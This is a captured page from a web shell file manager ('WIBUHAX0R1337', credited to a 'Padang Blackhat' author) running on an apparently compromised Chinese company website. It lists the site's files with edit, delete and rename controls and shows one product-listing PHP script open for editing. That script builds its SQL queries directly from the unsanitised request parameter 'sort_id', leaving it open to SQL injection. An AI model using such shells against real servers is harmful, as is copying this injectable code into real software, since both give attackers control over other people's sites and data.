-
WIBUHAX0R1337
-
/
home
/
zqegovsj
/
www
/
us3web.haibo.com.cn
/
rgscreen
/
my
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
.well-known
--
NONE
a1creathtml
--
NONE
cgi-bin
--
NONE
css
--
NONE
flag
--
NONE
js
--
NONE
pic
--
NONE
right-images
--
NONE
.htaccess
2.242KB
Edit File
Delete File
Rename
a_feedback.php
3.254KB
Edit File
Delete File
Rename
a_pagetitle.php
1.12KB
Edit File
Delete File
Rename
a_submenu.php
1.083KB
Edit File
Delete File
Rename
about.html
34.296KB
Edit File
Delete File
Rename
about.php
2.61KB
Edit File
Delete File
Rename
auth_image.php
0.845KB
Edit File
Delete File
Rename
case-index.php
2.382KB
Edit File
Delete File
Rename
case.php
2.081KB
Edit File
Delete File
Rename
certificatehonor.php
1.855KB
Edit File
Delete File
Rename
contact.html
28.799KB
Edit File
Delete File
Rename
contact.php
1.431KB
Edit File
Delete File
Rename
download.php
1.267KB
Edit File
Delete File
Rename
error_log
4.34MB
Edit File
Delete File
Rename
foot.php
9.239KB
Edit File
Delete File
Rename
function.php
8.132KB
Edit File
Delete File
Rename
googlea2946616695ccb8f.html
0.052KB
Edit File
Delete File
Rename
head.php
2.508KB
Edit File
Delete File
Rename
index.html
59.563KB
Edit File
Delete File
Rename
lang.php
6.825KB
Edit File
Delete File
Rename
lang_about.php
7.553KB
Edit File
Delete File
Rename
lang_index.php
3.075KB
Edit File
Delete File
Rename
lang_whychooseus.php
1.684KB
Edit File
Delete File
Rename
message.php
3.424KB
Edit File
Delete File
Rename
nav.php
11.313KB
Edit File
Delete File
Rename
news-index.php
7.774KB
Edit File
Delete File
Rename
news.php
2.633KB
Edit File
Delete File
Rename
news2.php
2.743KB
Edit File
Delete File
Rename
page_navigation.php
0.985KB
Edit File
Delete File
Rename
page_search.php
1.012KB
Edit File
Delete File
Rename
product.php
2.446KB
Edit File
Delete File
Rename
product2.php
5.112KB
Edit File
Delete File
Rename
product_index.php
7.487KB
Edit File
Delete File
Rename
products.php
12.15KB
Edit File
Delete File
Rename
search2.php
2.271KB
Edit File
Delete File
Rename
site_map.php
3.889KB
Edit File
Delete File
Rename
tag.php
0.979KB
Edit File
Delete File
Rename
video.php
2.107KB
Edit File
Delete File
Rename
whychooseus.php
4.202KB
Edit File
Delete File
Rename
<?php include("function.php"); $page = !empty($_GET['st']) ? (int)$_GET['st'] : 1; $limit = 20; // 每页显示的数量 $offset = ($page - 1) * $limit; // 计算偏移量 isset($_GET['st'])?$st=$_GET['st']:$st=1; $countsubidsql=$db->selectarray( "SELECT id from ".$noe_version."_producttypes where level =".$_GET['sort_id']); $countsubid=$db->toarray($countsubidsql); if (!empty($countsubid)){ $r=$db->array_multi2single($countsubid); if (!is_array($r)) { $r = is_iterable($r) ? iterator_to_array($r) : array($r); } @$r=array_unique($r); $r = implode(",", $r); $countsubsubidsql =$db->selectarray( "select id from ".$noe_version."_producttypes where level in (".$_GET['sort_id'].",".$r.")"); $countsubsubid=$db->toarray($countsubsubidsql); if (!empty($countsubsubid)){ $subr=$db->array_multi2single($countsubsubid); if (!is_array($subr)) { $r = is_iterable($subr) ? iterator_to_array($subr) : array($subr); } @$subr=array_unique($subr); $subr = implode(",", $subr); $sql = "select count(id) from ".$noe_version."_products where producttype_id in (".$_GET['sort_id'].",".$r.",".$subr.") "; $products =$db->selectarray( "select id,name,sn,picture,name2,price,sizes from ".$noe_version."_products where producttype_id in (".$_GET['sort_id'].",".$r.",".$subr.") order by ep_range desc LIMIT ".($st-1)*$limit.','.$limit); } else { $sql = "select count(id) from ".$noe_version."_products where producttype_id in (".$_GET['sort_id'].",".$r.") "; $products =$db->selectarray( "select id,name,sn,picture,name2,price,sizes from ".$noe_version."_products where producttype_id in (".$_GET['sort_id'].",".$r.") order by ep_range desc LIMIT ".($st-1)*$limit.','.$limit); } } else { $sql = "select count(id) from ".$noe_version."_products where producttype_id = ".$_GET['sort_id']; $products =$db->selectarray( "select id,name,sn,picture,name2,price,sizes from ".$noe_version."_products where producttype_id =".$_GET['sort_id']." order by ep_range desc LIMIT ".($st-1)*$limit.','.$limit); } $num = $db->selectarray($sql); $num = $db->toarray($num); isset($num[0][0])?$pagecount=$num[0][0]:$st=1; $number=($st-1)*$limit+1; $number2=($st-1)*$limit+$limit; $total_pages = ceil($pagecount / $limit); $tit=$db->selectone("select id,name,level,img,name2,keyword,des from ".$noe_version."_producttypes where id='".$_GET['sort_id']."'"); if($tit[2]==0){ $bb=$db->turn_name($tit[4]).'_supply'.$tit[0].'.html'; $bbb=$tit[1]; $pcateid=$tit[0]; } else{ $cc=$db->turn_name($tit[4]).'_supply'.$tit[0].'.html'; $ccc=$tit[1]; $uptit=$db->selectone("select id,name,img,name2,level from ".$noe_version."_producttypes where id='".$tit[2]."'"); $bb=$db->turn_name($uptit[3]).'_supply'.$uptit[0].'.html'; $bbb=$uptit[1]; $pcateid=$uptit[0]; if($uptit[4]!=0){ $ptoptybe=$db->selectone("select id,name,img,name2,level from ".$noe_version."_producttypes where id='".$uptit[4]."'"); if(isset($ccc)){$ddd=$ccc; $dd=$cc;}; if(isset($bbb)){$ccc=$bbb; $cc=$bb;}; $bb=$db->turn_name($ptoptybe[3]).'_supply'.$ptoptybe[0].'.html'; $bbb=$ptoptybe[1]; } } $aa='product.html'; $aaa=$lang['words'][72]; $urlsort=$db->turn_name($tit[4]).'_supply'.$tit[0]; $purl=$db->turn_name($tit[4]).'_supply'.$tit[0].'.html'; $feedbacktit=$tit[1]; $pageh1=$tit[1]; $bannerpic=$db->selectone("select product_pic from ".$noe_version."_companies where member_id=".$id); $topbg=$imgprod.'/upload/big/'.$bannerpic[0]; $pagekeyword=$tit['1'].', '.$lang['words'][1]; $pagekeyword2=$pagekeyword; $pagekeyword3=$tit['1'].' '.$lang['words'][159].', '.$lang['words'][194].', '.$lang['words'][193].', '.$lang['words'][191].' '.$tit['1'].' '.$lang['words'][156].', '.$lang['words'][157].', '.$lang['words'][158]; include("head.php"); ?> <?php include("a_pagetitle.php");?> <section id="content"> <div class="content-wrap pt-0 mt-0"> <div class="container"> <div class="prodtop mt-5"> <h2 class="mb-0"><?php if(isset($ccc))echo $ccc;elseif(isset($bbb))echo $bbb;else{?><?=$lang['words'][94]?><?php }?>: <span class="en-3"><?=$lang['words'][93]?> <?=$pagecount?> | <?=$number?> - <?=$number2?></span></h2> </div> <div id="shop" class="shop row gutter-20"> <?php $i=1; while(@$a=mysqli_fetch_row($products)){ ?> <div class="product col-lg-3 col-md-4 col-sm-6 col-6"> <div class="charity-card h-shadow shadow-ts card rounded-5"> <div class="product p-2"> <div class="product-image"> <a href="https://<?=$siteweb?>/<?=$db->turn_name($a[4])?>_product<?=$a[0]?>.html" title="<?=$a[1]?>"><img src="https://<?=$imgprod?>/upload/middle/<?=$a[3]?>" alt="<?=$a[1]?>"></a> </div> <div class="product-desc"> <div class="product-title mb-0"> <p class="fw-semibold mb-2 mt-2"><?=$a[2]?></p> <h3 class="mb-0 font-14px"><a class="fw-light" href="/<?=$db->turn_name($a[4])?>_product<?=$a[0]?>.html" title="<?=$a[1]?>"><?=$a[1]?></a></h3></div> </div> </div> </div></div> <?php $i++;?> <?php }?> </div> <?php if($pagecount>20){?> <div class="page_num clearfix"> <?php include("page_navigation.php");?> </div> <?php }?> </div> </div> </section> <?php include("foot.php");?>
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat